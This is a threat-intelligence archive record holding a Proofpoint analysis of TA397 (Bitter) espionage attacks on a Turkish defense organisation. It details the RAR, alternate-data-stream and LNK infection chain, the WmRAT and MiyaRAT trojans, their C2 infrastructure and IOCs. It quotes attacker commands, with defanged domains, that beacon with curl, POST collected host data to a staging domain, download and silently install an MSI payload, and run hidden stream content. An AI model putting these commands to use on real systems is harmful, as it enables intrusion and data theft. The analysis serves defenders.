{
	"id": "b30173a9-6ba8-4754-8890-4ccfc6efea8f",
	"created_at": "2026-04-06T00:09:45.156372Z",
	"updated_at": "2026-04-10T03:33:57.013145Z",
	"deleted_at": null,
	"sha1_hash": "2dd8df21de3d82903c0b789a398780aa8df6e1d1",
	"title": "Hidden in Plain Sight: TA397’s New Attack Chain Delivers Espionage RATs | Proofpoint US",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 2329787,
	"plain_text": "Hidden in Plain Sight: TA397’s New Attack Chain Delivers Espionage\r\nRATs | Proofpoint US\r\nPublished: 2024-12-11 · Archived: 2026-04-02 11:20:17 UTC\r\nDecember 17, 2024 Nick Attfield, Konstantin Klinger, Pim Trouerbach, David Galazin and the Proofpoint Threat\r\nResearch Team\r\nKey findings \r\nProofpoint observed advanced persistent threat (APT) TA397 targeting a Turkish defense sector organization with\r\na lure about public infrastructure projects in Madagascar.  \r\nThe attack chain used alternate data streams in a RAR archive to deliver a shortcut (LNK) file that created a\r\nscheduled task on the target machine to pull down further payloads.  \r\nTA397 was observed manually delivering WmRAT and MiyaRAT malware families in the final stages of this\r\nattack chain. Both malware families are designed to enable intelligence gathering and exfiltration.  \r\nProofpoint assesses TA397 campaigns are almost certainly intelligence collection efforts in support of a South\r\nAsian government’s interests. \r\nOverview \r\nOn November 18, 2024, TA397 (also known by third-party researchers as Bitter) targeted a defense sector organization in\r\nTurkey with a spearphishing lure. The email included a compressed archive (RAR) file attachment containing a decoy\r\nPDF (~tmp.pdf) file detailing a World Bank public initiative in Madagascar for infrastructure development, a shortcut\r\n(LNK) file masquerading as a PDF (PUBLIC INVESTMENTS PROJECTS 2025.pdf.lnk), and an Alternate Data Stream\r\n(ADS) file that contained PowerShell code.  \r\nThe lure contained the subject “PUBLIC INVESTMENTS PROJECTS 2025 _ MADAGASCAR” which closely matched\r\nthe LNK file name masquerading as a PDF within the RAR archive: “PUBLIC INVESTMENTS PROJECTS\r\n2025.pdf.lnk”. 
This subject line theme is very common for TA397, as the majority of the organizations they target are\r\neither in the public sector or receive public investments, and it is indicative of the targeted nature of their campaigns.  \r\nThe usage of RAR archives is a staple tactic of TA397 payload delivery. Throughout the first half of 2024, Proofpoint has\r\nobserved TA397 utilizing Microsoft Compiled HTML Help (CHM) files within RAR archives as a means of creating\r\nscheduled tasks on target machines.  \r\nThis blog post details TA397’s usage of NTFS alternate data streams (ADS) in combination with PDF and LNK files to\r\ngain persistence, which facilitates the deployment of further malware. This research also looks at the continued usage of\r\nwmRAT by TA397, the recently discovered MiyaRAT, a contemporary addition to the threat actor’s arsenal, and the\r\nassociated infrastructure of TA397.  \r\nInfection chain \r\nThe spearphishing email originated from a compromised email account belonging to a government organization and\r\ncontained a RAR archive with a variety of artifacts inside. Alongside the LNK file was a “~tmp.pdf” file and two NTFS\r\nalternate data streams (ADS), one titled “Participation” and the other a “Zone.Identifier”.  \r\nhttps://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats\r\nPage 1 of 14\n\nIllustration of the TA397 infection chain.  \r\nWhen opening the RAR file, the target would only see the LNK file, as the ADS streams are hidden from the user when\r\nusing Windows’ built-in RAR extraction utility or WinRAR. Further, the PDF had the Hidden, System \u0026 Files\r\nready for archiving (HSA) attributes enabled, so the user is lured to believe that a PDF file is being opened due to the extension\r\npdf.lnk. By default, Windows hides the real extension of a file. 
However, if the RAR is opened in 7-Zip, the user can view\r\nand extract the NTFS ADS streams on Windows systems (on an NTFS-formatted volume): \r\n7-Zip view on 53a653aae9678075276bdb8ccf5eaff947f9121f73b8dcf24858c0447922d0b1.  \r\nAlternate data streams are a feature of the NTFS file system in Windows that allows additional named data streams to be attached to a file. There are\r\ncertain archive formats and software that allow ADS streams to be included in the archive container along with the file.\r\nThe archive format used in this attack chain is RAR v5, which allows the storage of NTFS ADS streams.  \r\nThe Zone.Identifier stream is an ADS introduced in older Windows versions as a security feature. It stores information\r\nabout the origin of a file, such as the URL Security Zone (e.g., Zone 3 for the internet), to determine if the file is\r\ntrustworthy. Files downloaded via browsers automatically receive this stream. Additionally, when files are extracted from\r\na downloaded archive using Windows Explorer, the extracted files inherit a Zone.Identifier stream with a ReferrerUrl\r\npointing to the original archive. A Zone.Identifier ADS is very common and is not required for the success of this attack\r\nchain; nevertheless, it can provide useful information for forensic analysis.  \r\nThe Zone.Identifier ADS contains information about the origin of the “~tmp.pdf” file, and can be seen below: \r\nScreenshot of the PDF Zone.Identifier details.  \r\nThe “~tmp.pdf” file is a legitimate PDF downloaded from the World Bank organization, detailing an infrastructure project\r\nabout paved roads in Madagascar. This can be seen in the following screenshot: \r\nLegitimate PDF used as a decoy document in the campaign. 
\r\nThe second ADS is the “Participation” ADS. Inside the “Participation” stream was a base64 encoded PowerShell blob: \r\nBase64 encoded PowerShell from “Participation”.  \r\nThe LNK ran the following conhost command: \r\n --headless cmd /k \"cmd \u003c ~tmp.pdf:Participation \u0026 exit\"\r\nThis caused cmd to read and run the base64 encoded PowerShell contained within the “Participation” ADS stream of ~tmp.pdf,\r\nwhich decoded to the following command: \r\nDecoded PowerShell command. \r\nThis PowerShell command opened the PDF lure file, which displayed the World Bank decoy document to the user, and the\r\ncommand then set up a scheduled task named “DsSvcCleanup”. This scheduled task attempted to send target host\r\ninformation (username and computer name) with the curl utility every 17 minutes to the domain jacknwoods[.]com. This\r\nURI structure is used regularly by TA397. Upon successful retrieval of a payload, the downloaded file is launched with a\r\ncommand prompt. The task will continue to run even if a payload is dropped to the victim machine.\r\nThese requests were structured as follows:\r\nGET hxxp[:]//jacknwoods[.]com/jacds[.]php?jin=%computername%_%username%\r\nHost: jacknwoods[.]com\r\nUser-Agent: curl/7.55.1\r\nAccept: */*\r\nProofpoint observed TA397 operators respond to these requests with manual commands approximately 12 hours after the\r\nfirst scheduled task request, deploying two distinct payloads and a third command that enumerated the target machine and\r\nissued a POST request containing that information.  \r\nFirst, we observed this response from the attacker server:\r\nFirst payload observed.  
\r\nThis command downloads and runs the “anvrsa.msi” file on the target machine, which installs the WmRAT file\r\n“anvrsa.exe”.  \r\nTA397 issued further commands once they determined there was no successful communication from WmRAT. Shortly\r\nafter, Proofpoint observed TA397 issuing the following commands to enumerate the target machine:  \r\ncd C:\\programdata\r\ndir \u003e\u003e abc[.]pdf\r\ntasklist \u003e\u003e abc[.]pdf\r\nwmic /namespace:\\\\root\\SecurityCenter2 path AntiVirusProduct get displayName \u003e\u003e abc[.]pdf\r\ncmd /c curl -X POST -F \"file=[@]C:\\programdata\\abc[.]pdf\"\r\nhxxps[:]//www[.]jacknwoods[.]com/chthuo[.]php?ain=%computername%_%username%\r\ndel abc[.]pdf\r\nThis series of commands shows TA397 enumerating the ProgramData directory, listing currently running processes,\r\nusing the Windows Management Instrumentation Command-line utility (WMIC) to identify any antivirus products running on the target machine, and\r\nexfiltrating that data in a file to a different endpoint on the jacknwoods[.]com domain. A very similar set of commands\r\nwas previously observed and attributed to TA397 and published by StrikeReady Labs. \r\nFollowing that, Proofpoint researchers observed TA397 dropping another payload by downloading and running\r\n“gfxview.msi”:  \r\ncurl -o C:\\users\\public\\music\\gfxview[.]msi\r\nhttp://jacknwoods[.]com/gfxview[.]msi\r\nmsiexec /i C:\\users\\public\\music\\gfxview.msi /qn /norestart\r\nThis acted as the dropper to install “xrgtg.exe”, which was the MiyaRAT payload. WmRAT and MiyaRAT were first\r\nidentified by QiAnXin Threat Intelligence Center. Below is Proofpoint’s detailed analysis of WmRAT and MiyaRAT.  \r\nWmRAT \r\nWmRAT is a remote access trojan (RAT) written in C++ that uses sockets for communications and has standard RAT\r\nfunctionality. 
The RAT can gather basic host information, upload or download files, take screenshots, get geolocation data\r\nof the target machine, enumerate directories and files, and run arbitrary commands via cmd or PowerShell. The malware\r\nalso generates a number of junk threads, potentially to mislead researchers or responders investigating the samples. \r\nThe malware starts by calling GetDynamicTimeZoneInformation and copying the returned timezone information. Rather than any\r\nunique or interesting sleep techniques, this malware uses the classic method of directly calling Sleep. This is done\r\nthroughout the malware at various stages, and there is also a dedicated function whose only purpose is to initiate a\r\nlong sleep.  \r\nThe sample then creates a thread which gathers some basic host information: \r\nUsername \r\nHostname \r\nThe list of logical drives for the host \r\nWhile this information is gathered, nothing is done with it, and this process is repeated 1,000 times. Most likely this is just\r\nto fill up behavior logs or create copious amounts of noise within the environment.   \r\nMalware gathering basic disk information.  \r\nSoon after creating this thread, another thread is created that executes the exact same function, gathering the same\r\ninformation.  \r\nWith the threads created, the malware begins attempts to communicate with the C2. In the samples observed by\r\nProofpoint, a socket has not been initialized yet at this stage, so these specific communications fail. Later in the\r\nexecution the socket is initialized properly, so the malware is able to communicate with the C2 after that point.  
The\r\nmalware decrypts the C2 server address academymusica[.]com by taking each character from an encrypted blob and\r\nsubtracting 0x25 from it.  \r\nDecryption of server address academymusica[.]com.\r\nThis subtraction cipher is how all string decryption is done for the malware. Each character has a set value added to or\r\nsubtracted from it, resulting in the expected output. Generally, when malware sends command identifiers or data\r\nidentifiers to the C2, it is done in plaintext or is some numeric value. But in the case of this malware, it sends seemingly\r\nrandom values as identifiers, such as the “*****” below.  \r\nCleartext string of asterisks.  \r\nAssuming all the junk threads have started, the malware does a connectivity check by making a request to\r\nmicrosoft[.]com. After this, the socket is finally initialized to connect to the C2 decrypted earlier in the program. This is\r\nset to communicate with a hardcoded port, which in this sample is set to 47408. \r\nHardcoded port initialization.  \r\nThe socket receives a 4-byte value from the C2, swaps its endianness, and passes it to the command handler; the value\r\nindicates the ordinal of the command to execute.  
\r\nInvocation of the command handler, after socket initialization.\r\nAs far as supported commands, these are some of the most notable ones: \r\n8: read and exfil file \r\n9: create host summary  \r\n12: exit infection \r\n13: receive data from the C2, and write to file stream \r\n15: receive and decrypt filepath from C2 \r\n19: take screenshot and exfil \r\n21: get geolocation information \r\n22: get file listing from given directory and gather file create/modification time \r\n24: get disk size for files and directories \r\n26: mini command handler \r\n27: exec string in cmd or powershell, or restart self \r\n31: exit \r\nMiyaRAT \r\nMiyaRAT is also written in C++ and contains similar functionality to WmRAT. The malware starts by decrypting its\r\nhardcoded C2 server. This domain is decoded by taking the encoded value and subtracting the matching character in the\r\nstring “doobiedoodooziezzz” from it.  \r\nDecoding C2 server samsnewlooker[.]com.  \r\nDoing this results in the C2 domain samsnewlooker[.]com. Along with this, the sample has a hardcoded port value, stored as\r\na string, which determines which port the implant connects to. Strangely, the malware then runs its own implementation of the\r\nMersenne Twister, a common pseudorandom number generator, to generate the values used for sleep durations.  \r\nWith the C2 decoded, a global socket is then created with the hardcoded port of 56189.  \r\nSocket creation with hardcoded port 56189.  
\r\nAfter the socket is initialized, MiyaRAT gathers basic system information which is sent in the first communication to the\r\nC2.  \r\nBasic information gathered to send to the threat actor.  \r\nOne of the final fields sent within the initial communication is the version of the malware, in this case being 3.  \r\nMalware version information.  \r\nThis data is then encrypted by XORing each byte of the data with 0x43. An example of the entire set of data sent to the\r\nC2 can be seen below.  \r\n``` \r\nC:\\--3  [106.07/238.47] GB FREE \r\n|\u003cusername\u003e|\u003chostname\u003e|C:\\Windows\\cnstaller\\MScCA69.tmp|C:\\Users\\\u003cuser\u003e|10.0 125 19044|3.0| \r\n``` \r\nThe C2 can respond with any of the commands that MiyaRAT supports: \r\nGDIR – get directory tree \r\nDELz – remove directory/file \r\nGFS – enumerate all files from a specific directory \r\nSH1start_cmd – reverse shell using CMD \r\nSH1start_ps – reverse shell using PowerShell \r\nSH1 – interact with reverse shell \r\nSFS – connect to new socket to upload and download files via UPL/DWNL \r\nGSS – take screenshot and exfil  \r\nSH1exit_client – close infection \r\nSH2 - interact with reverse shell \r\nNetwork analysis \r\nTA397’s infrastructure usage throughout this campaign is divided between the implant domains and the staging domains.\r\nThe jacknwoods[.]com domain acted as their staging domain to distribute WmRAT and MiyaRAT, and\r\nacademymusica[.]com and samsnewlooker[.]com as C2 domains for each implant.  \r\nThe staging domain jacknwoods[.]com resolved to 185.244.151[.]84, served a Let’s Encrypt certificate, and was registered through\r\nGoDaddy. Proofpoint has observed this combination of domain registration patterns in several previous\r\nTA397 campaigns when deploying staging infrastructure. The IP is multi-tenanted, and not controlled by TA397.  
\r\nThe WmRAT C2 academymusica[.]com resolved to 38.180.142[.]228 at the time of analysis, while the MiyaRAT C2\r\nsamsnewlooker[.]com resolved to 96.9.215[.]155. Proofpoint assesses it is likely these two IPs are attacker-owned\r\ninfrastructure.   \r\nAttribution \r\nWhilst this blog has revealed an interesting evolution of TTPs in TA397’s capability set, this activity still demonstrates\r\nsignature markers of behavior Proofpoint has observed from TA397 historically: \r\nThe usage of RAR archives to deliver a payload that creates a scheduled task on target machines, with a command\r\nline structure that seldom changes.  \r\nThe infrastructure and hosting providers in use bear similarities to historical TA397 infrastructure.  \r\nTargeting organizations in the defense sector in the EMEA and APAC regions. \r\nAcross observed campaigns, activity consistently falls within the working hours of UTC+5:30. Proofpoint has\r\nobserved the manual deployment of TA397 malware multiple times across different campaigns that align with the\r\nworking hours of this timezone.  \r\nBoth RATs analyzed in this blog have been historically attributed to TA397 (wmRAT and MiyaRAT respectively),\r\nand Proofpoint concurs with this assessment.  \r\nProofpoint assesses WmRAT and MiyaRAT are two distinct malware families in active, operational use by TA397. We\r\nbelieve it is a realistic possibility that both families were written by the same developer(s). It is also clear that MiyaRAT is\r\nthe newer of the two tools in their arsenal. Proofpoint assesses MiyaRAT may be reserved for targets TA397 deems high\r\nvalue, due to the observed sporadic deployment of the malware in only a certain number of campaigns.  
\r\nBased on Proofpoint's analysis of the characteristics of the observed campaign, previously observed lure content,\r\nhistorical targeting, time-based analysis of TA397 campaigns, and a review of industry reporting on activity associated with\r\nBitter, Proofpoint researchers assess these campaigns are almost certainly intelligence collection efforts in support of a\r\nSouth Asian government’s interests.  \r\nWhy it matters \r\nTA397 is a prominent South Asian-nexus, espionage-focused APT that frequently and consistently targets government,\r\nenergy, telecommunications, defense and engineering organizations throughout the EMEA and APAC regions. They\r\npersistently utilize scheduled tasks to communicate with their staging domains to deploy malicious backdoors into target\r\norganizations, for the purpose of gaining access to privileged information and intellectual property.  \r\nThis blog provides defenders with the knowledge and tools necessary to identify and defend against intrusions from\r\nTA397. \r\nYARA / ET sigs \r\nYARA signature available here. 
\r\n2058192 - ET MALWARE TA397/Bitter Requesting Next Stage Payload\r\nIOCs \r\nIndicator | Type | First Observed | Description\r\n53a653aae9678075276bdb8ccf5eaff947f9121f73b8dcf24858c0447922d0b1 | SHA256 | 2024-11-18 | RAR\r\nf6c77098906f5634789d7fd7ff294bfd95325d69f1be96be1ee49ff161e07733 | SHA256 | 2024-11-18 | LNK\r\n10cec5a84943f9b0c635640fad93fd2a2469cc46aae5e43a4604c903d139970f | SHA256 | 2024-09-23 | wmRAT\r\nc7ab300df27ad41f8d9e52e2d732f95479f4212a3c3d62dbf0511b37b3e81317 | SHA256 | 2024-10-12 | MiyaRAT\r\nacademymusica[.]com | Domain | 2024-11-06 | C2\r\nsamsnewlooker[.]com | Domain | 2024-09-25 | C2\r\njacknwoods[.]com | Domain | 2024-11-07 | Staging Domain\r\n38.180.142[.]228 | IP | 2024-11-06 | C2\r\n96.9.215[.]155 | IP | 2024-09-25 | C2\r\nSource: https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MISPGALAXY"
	],
	"references": [
		"https://www.proofpoint.com/us/blog/threat-insight/hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats"
	],
	"report_names": [
		"hidden-plain-sight-ta397s-new-attack-chain-delivers-espionage-rats"
	],
	"threat_actors": [
		{
			"id": "655f7d0b-7ea6-4950-b272-969ab7c27a4b",
			"created_at": "2022-10-27T08:27:13.133291Z",
			"updated_at": "2026-04-10T02:00:05.315213Z",
			"deleted_at": null,
			"main_name": "BITTER",
			"aliases": [
				"T-APT-17"
			],
			"source_name": "MITRE:BITTER",
			"tools": [
				"ZxxZ"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "acd789fa-d488-47f3-b9cc-fdb18b1fa375",
			"created_at": "2023-01-06T13:46:39.332092Z",
			"updated_at": "2026-04-10T02:00:03.290017Z",
			"deleted_at": null,
			"main_name": "HAZY TIGER",
			"aliases": [
				"T-APT-17",
				"APT-C-08",
				"Orange Yali",
				"TA397"
			],
			"source_name": "MISPGALAXY:HAZY TIGER",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bf6cb670-bb69-473f-a220-97ac713fd081",
			"created_at": "2022-10-25T16:07:23.395205Z",
			"updated_at": "2026-04-10T02:00:04.578924Z",
			"deleted_at": null,
			"main_name": "Bitter",
			"aliases": [
				"G1002",
				"T-APT-17",
				"TA397"
			],
			"source_name": "ETDA:Bitter",
			"tools": [
				"Artra Downloader",
				"ArtraDownloader",
				"Bitter RAT",
				"BitterRAT",
				"Dracarys"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434185,
	"ts_updated_at": 1775792037,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2dd8df21de3d82903c0b789a398780aa8df6e1d1.pdf",
		"text": "https://archive.orkl.eu/2dd8df21de3d82903c0b789a398780aa8df6e1d1.txt",
		"img": "https://archive.orkl.eu/2dd8df21de3d82903c0b789a398780aa8df6e1d1.jpg"
	}
}